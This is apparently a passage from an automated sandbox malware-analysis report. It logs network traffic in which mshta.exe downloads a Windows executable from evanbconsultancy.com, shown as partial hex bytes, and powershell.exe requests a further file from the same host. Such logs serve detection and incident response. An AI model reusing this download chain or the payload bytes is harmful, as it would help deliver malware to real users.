                                                                                                                                                                                                        Dec 21, 2024 15:02:25.660443068 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.661967039 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.661978006 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.677076101 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.677135944 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.677140951 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.685399055 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.688597918 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.688604116 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.738771915 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.748270035 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.801996946 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.802014112 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.827294111 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.828003883 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.828011036 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.834589958 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.834836006 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.834918022 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.834925890 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.834971905 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.840205908 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.845834970 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.848889112 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.848906040 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.894954920 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.960136890 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.965570927 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.965631962 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:25.965651035 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.019969940 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.019983053 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.066858053 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.085539103 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.087280989 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.087332010 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.087342978 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.129337072 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205233097 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205395937 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205420017 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205440044 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205461025 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205512047 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205518961 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205576897 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205601931 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205622911 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205626965 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205662012 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205705881 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205712080 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205755949 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.205940008 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.206567049 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.206628084 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.206635952 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.206676960 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209299088 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209306002 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209367990 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209422112 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209429026 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209471941 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209553003 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209561110 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209609985 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209611893 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209623098 CET4434972384.32.84.121192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209657907 CET49723443192.168.2.784.32.84.121
                                                                                                                                                                                                        Dec 21, 2024 15:02:26.209939957 CET49723443192.168.2.784.32.84.121

                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.338119030 CET6244253192.168.2.71.1.1.1
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.775643110 CET53624421.1.1.1192.168.2.7
                                                                                                                                                                                                        Dec 21, 2024 15:02:36.585401058 CET6470853192.168.2.71.1.1.1
                                                                                                                                                                                                        Dec 21, 2024 15:02:49.689579010 CET5711653192.168.2.71.1.1.1

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.338119030 CET192.168.2.71.1.1.10x2fbaStandard query (0)evanbconsultancy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:02:36.585401058 CET192.168.2.71.1.1.10x47edStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:02:49.689579010 CET192.168.2.71.1.1.10x70f2Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Dec 21, 2024 15:02:14.775643110 CET1.1.1.1192.168.2.70x2fbaNo error (0)evanbconsultancy.com84.32.84.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:02:32.277148008 CET1.1.1.1192.168.2.70xf9e0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:02:32.277148008 CET1.1.1.1192.168.2.70xf9e0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:02:36.804789066 CET1.1.1.1192.168.2.70x47edNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:02:49.832209110 CET1.1.1.1192.168.2.70x70f2No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:03:37.185849905 CET1.1.1.1192.168.2.70xb9e6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:03:37.185849905 CET1.1.1.1192.168.2.70xb9e6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:04:01.248424053 CET1.1.1.1192.168.2.70xdf15No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Dec 21, 2024 15:04:01.248424053 CET1.1.1.1192.168.2.70xdf15No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • evanbconsultancy.com

                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.74970284.32.84.1214436912C:\Windows\System32\mshta.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC334OUTGET /Sand/Buddy HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Language: en-CH
                                                                                                                                                                                                        UA-CPU: AMD64
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                        Host: evanbconsultancy.com
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Sat, 21 Dec 2024 14:02:16 GMT
                                                                                                                                                                                                        Content-Length: 472046
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        cache-control: public, max-age=604800
                                                                                                                                                                                                        expires: Fri, 27 Dec 2024 20:30:52 GMT
                                                                                                                                                                                                        last-modified: Tue, 17 Dec 2024 12:56:31 GMT
                                                                                                                                                                                                        etag: "733ee-676174ff-8b8c2823ba79bbde;;;"
                                                                                                                                                                                                        platform: hostinger
                                                                                                                                                                                                        panel: hpanel
                                                                                                                                                                                                        content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                        Age: 63084
                                                                                                                                                                                                        Server: hcdn
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        x-hcdn-request-id: faba521d3c9d4747125693dd9c2f6c8a-bos-edge2
                                                                                                                                                                                                        x-hcdn-cache-status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC846INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a0 52 e6 d8 e4 33 88 8b e4 33 88 8b e4 33 88 8b 00 43 8b 8a e7 33 88 8b 00 43 8c 8a fc 33 88 8b 00 43 8d 8a e3 33 88 8b 00 43 89 8a f9 33 88 8b e4 33 89 8b cd 32 88 8b 00 43 80 8a f0 33 88 8b 00 43 77 8b e5 33 88 8b 00 43 8a 8a e5 33 88 8b 52 69 63 68 e4 33 88 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 fd b9 f0 9e 00 00 00
                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$R333C3C3C3C332C3Cw3C3Rich3PEL
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 18 41 00 f0 18 41 00 70 f7 40 00 00 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04
                                                                                                                                                                                                        Data Ascii: AAp@
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: 00 80 f6 00 00 90 f6 00 00 a0 f6 00 00 b0 f6 00 00 c0 f6 00 00 d0 f6 00 00 e0 f6 00 00 f0 f6 00 00 00 f7 00 00 10 f7 00 00 60 f7 00 00 70 f7 00 00 70 01 01 00 80 01 01 00 a0 01 01 00 b0 01 01 00 d0 01 01 00 f0 01 01 00 c4 23 01 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 36 87 61 3d 3c cf 11 81 0c 00 aa 00 38 9b 71 53 65 63 75 72 33 32 2e 64 6c 6c 00 00 00 00 00 28 00 6e 00 75 00 6c 00 6c 00 29 00 00 00 00 00 41 00 63 00 63 00 65 00 73 00 73 00 69 00 62 00 69 00 6c 00 69 00 74 00 79 00 53 00 6f 00 75 00 6e 00 64 00 41 00 67 00 65 00 6e 00 74 00 52 00 75 00 6e 00 6e 00 69 00 6e 00 67 00 00 00 00 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 73 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 45 00 61 00 73 00 65 00 4f 00
                                                                                                                                                                                                        Data Ascii: `pp#6a=<8qSecur32.dll(null)AccessibilitySoundAgentRunning%SystemRoot%\system32\EaseO
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: 74 00 79 00 6c 00 65 00 73 00 00 00 4e 00 6f 00 72 00 6d 00 61 00 6c 00 53 00 69 00 7a 00 65 00 00 00 00 00 00 00 00 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 52 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 5c 00 54 00 68 00 65 00 6d 00 65 00 73 00 5c 00 41 00 65 00 72 00 6f 00 5c 00 00 00 41 00 65 00 72 00 6f 00 4c 00 69 00 74 00 65 00 2e 00 6d 00 73 00 73 00 74 00 79 00 6c 00 65 00 73 00 00 00 e0 3d 4c 39 6f 3c d2 11 81 7b 00 c0 4f 79 7a b7 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e
                                                                                                                                                                                                        Data Ascii: tylesNormalSize%SystemRoot%\Resources\Themes\Aero\AeroLite.msstyles=L9o<{OyzSoftware\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: 00 72 00 79 00 00 00 53 00 74 00 61 00 72 00 74 00 4c 00 69 00 73 00 74 00 3a 00 3a 00 53 00 61 00 76 00 65 00 53 00 65 00 74 00 74 00 69 00 6e 00 67 00 73 00 00 00 53 00 74 00 61 00 72 00 74 00 4c 00 69 00 73 00 74 00 3a 00 3a 00 53 00 61 00 76 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 4b 00 65 00 79 00 00 00 00 00 00 00 53 00 6f 00 66 00 74 00 77 00 61 00 72 00 65 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 5c 00 41 00 63 00 63 00 65 00 73 00 73 00 69 00 62 00 69 00 6c 00 69 00 74 00 79 00 5c 00 41 00 54 00 73 00 5c 00 00 00 53 00 74 00 61 00 72 00 74 00 4c 00 69 00 73 00
                                                                                                                                                                                                        Data Ascii: ryStartList::SaveSettingsStartList::SaveSessionKeySoftware\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\StartLis
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: 00 00 54 00 68 00 65 00 6d 00 65 00 55 00 49 00 2e 00 64 00 6c 00 6c 00 00 00 00 00 00 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 52 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 5c 00 45 00 61 00 73 00 65 00 20 00 6f 00 66 00 20 00 41 00 63 00 63 00 65 00 73 00 73 00 20 00 54 00 68 00 65 00 6d 00 65 00 73 00 5c 00 68 00 63 00 62 00 6c 00 61 00 63 00 6b 00 2e 00 74 00 68 00 65 00 6d 00 65 00 00 00 00 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 52 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 5c 00 45 00 61 00 73 00 65 00 20 00 6f 00 66 00 20 00 41 00 63 00 63 00 65 00 73 00 73 00 20 00 54 00 68 00 65 00 6d 00 65 00 73 00 5c 00 68 00 63 00 77 00 68 00 69 00 74 00 65 00 2e
                                                                                                                                                                                                        Data Ascii: ThemeUI.dll%SystemRoot%\Resources\Ease of Access Themes\hcblack.theme%SystemRoot%\Resources\Ease of Access Themes\hcwhite.
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: 00 77 00 69 00 6e 00 64 00 6f 00 77 00 74 00 72 00 61 00 63 00 6b 00 69 00 6e 00 67 00 00 00 00 00 77 00 69 00 6e 00 64 00 6f 00 77 00 74 00 72 00 61 00 63 00 6b 00 69 00 6e 00 67 00 7a 00 6f 00 72 00 64 00 65 00 72 00 00 00 00 00 77 00 69 00 6e 00 64 00 6f 00 77 00 74 00 72 00 61 00 63 00 6b 00 69 00 6e 00 67 00 74 00 69 00 6d 00 65 00 6f 00 75 00 74 00 00 00 6d 00 65 00 73 00 73 00 61 00 67 00 65 00 64 00 75 00 72 00 61 00 74 00 69 00 6f 00 6e 00 00 00 6d 00 69 00 6e 00 69 00 6d 00 75 00 6d 00 68 00 69 00 74 00 72 00 61 00 64 00 69 00 75 00 73 00 00 00 00 00 73 00 68 00 6f 00 77 00 73 00 6f 00 75 00 6e 00 64 00 73 00 00 00 00 00 77 00 69 00 6e 00 64 00 6f 00 77 00 61 00 72 00 72 00 61 00 6e 00 67 00 69 00 6e 00 67 00 00 00 63 00 61 00 72 00 65 00 74 00
                                                                                                                                                                                                        Data Ascii: windowtrackingwindowtrackingzorderwindowtrackingtimeoutmessagedurationminimumhitradiusshowsoundswindowarrangingcaret
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: 00 00 00 00 00 00 80 3f 00 00 80 3f 00 00 80 3f 00 00 00 00 00 00 80 3f 00 00 00 00 87 16 99 3e 87 16 99 3e 87 16 99 3e 00 00 00 00 00 00 00 00 a2 45 16 3f a2 45 16 3f a2 45 16 3f 00 00 00 00 00 00 00 00 d5 78 e9 3d d5 78 e9 3d d5 78 e9 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 46 00 69 00 6c 00 74 00 65 00 72 00 54 00 79 00 70 00 65 00 00 00 00 00 44 00 65 00 66 00 61 00 75 00 6c 00 74 00 41 00 63 00 63 00 6f 00 75 00 6e 00 74 00 53 00 41 00 4d 00 4e 00 61 00 6d 00 65 00 00 00 57 00 69 00 6e 00 6c 00 6f 00 67 00 6f 00 6e 00 41 00 63 00 63 00 65 00 73 00 73 00 00 00 00 00 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73
                                                                                                                                                                                                        Data Ascii: ????>>>E?E?E?x=x=x=??FilterTypeDefaultAccountSAMNameWinlogonAccessGlobal\Windows
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: 02 66 61 69 6c 75 72 65 54 79 70 65 00 08 6d 65 73 73 61 67 65 00 01 74 68 72 65 61 64 49 64 00 08 63 61 6c 6c 43 6f 6e 74 65 78 74 00 02 6f 72 69 67 69 6e 61 74 69 6e 67 43 6f 6e 74 65 78 74 49 64 00 08 6f 72 69 67 69 6e 61 74 69 6e 67 43 6f 6e 74 65 78 74 4e 61 6d 65 00 02 6f 72 69 67 69 6e 61 74 69 6e 67 43 6f 6e 74 65 78 74 4d 65 73 73 61 67 65 00 01 63 75 72 72 65 6e 74 43 6f 6e 74 65 78 74 49 64 00 08 63 75 72 72 65 6e 74 43 6f 6e 74 65 78 74 4e 61 6d 65 00 02 63 75 72 72 65 6e 74 43 6f 6e 74 65 78 74 4d 65 73 73 61 67 65 00 01 66 61 69 6c 75 72 65 49 64 00 08 66 61 69 6c 75 72 65 43 6f 75 6e 74 00 08 66 75 6e 63 74 69 6f 6e 00 02 04 cd 3b c4 79 ea 08 14 59 1e 38 9e 30 08 86 3a 0c 3e 00 4d 69 63 72 6f 73 6f 66 74 2e 57 69 6e 64 6f 77 73 2e 53 65 74
                                                                                                                                                                                                        Data Ascii: failureTypemessagethreadIdcallContextoriginatingContextIdoriginatingContextNameoriginatingContextMessagecurrentContextIdcurrentContextNamecurrentContextMessagefailureIdfailureCountfunction;yY80:>Microsoft.Windows.Set
                                                                                                                                                                                                        2024-12-21 14:02:16 UTC1369INData Raw: ff 75 0c ff 75 08 ff 15 4c 24 41 00 ff d6 5e 5f 5b 5d c2 24 00 cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 14 8b 4d 0c 56 8b 75 08 0f b6 01 8d 51 01 8b 4d 1c c1 e0 18 89 45 ec 0f b7 02 89 45 f0 8b 42 02 89 45 f4 8b 42 06 83 c2 0a 89 45 f8 8b 46 04 83 61 04 00 89 01 8b 46 04 51 ff 75 18 0f b7 00 83 61 14 00 ff 75 14 89 41 08 ff 75 10 c7 41 0c 02 00 00 00 89 51 10 0f b7 02 89 41 18 b8 e3 35 40 00 c7 41 1c 01 00 00 00 2d 00 33 40 00 89 45 fc 8d 45 ec 50 ff 76 1c ff 76 18 ff 15 2c 20 41 00 5e c9 c2 18 00 cc cc cc cc cc cc 8b ff 55 8b ec 8b 45 08 0b 45 0c 74 2a 8b 51 08 8b 41 0c 23 55 08 23 45 0c 0b d0 74 16 8b 41 10 8b 51 14 23 45 08 23 55 0c 3b 41 10 75 05 3b 51 14 74 04 32 c0 eb 02 b0 01 5d c2 08 00 cc cc cc cc cc cc 8b ff 55 8b ec 81 ec 2c 01 00 00 a1 04 13 41
                                                                                                                                                                                                        Data Ascii: uuL$A^_[]$UMVuQMEEBEBEFaFQuauAuAQA5@A-3@EEPvv, A^UEEt*QA#U#EtAQ#E#U;Au;Qt2]U,A


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.74971684.32.84.1214437496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-21 14:02:21 UTC100OUTGET /Fuel/Company%20Information.pdf HTTP/1.1
                                                                                                                                                                                                        Host: evanbconsultancy.com
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC591INHTTP/1.1 404 Not Found
                                                                                                                                                                                                        Date: Sat, 21 Dec 2024 14:02:22 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        x-powered-by: PHP/8.2.20
                                                                                                                                                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                        link: <https://evanbconsultancy.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                        platform: hostinger
                                                                                                                                                                                                        panel: hpanel
                                                                                                                                                                                                        content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                        Server: hcdn
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        x-hcdn-request-id: feab88e6b2425167f719ed53fc5720d6-bos-edge1
                                                                                                                                                                                                        2024-12-21 14:02:22 UTC778INData Raw: 34 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 65 76 61 6e 62 63 6f 6e 73 75 6c 74 61 6e 63 79 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c
                                                                                                                                                                                                        Data Ascii: 4e7<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; evanbconsultancy.com</title><
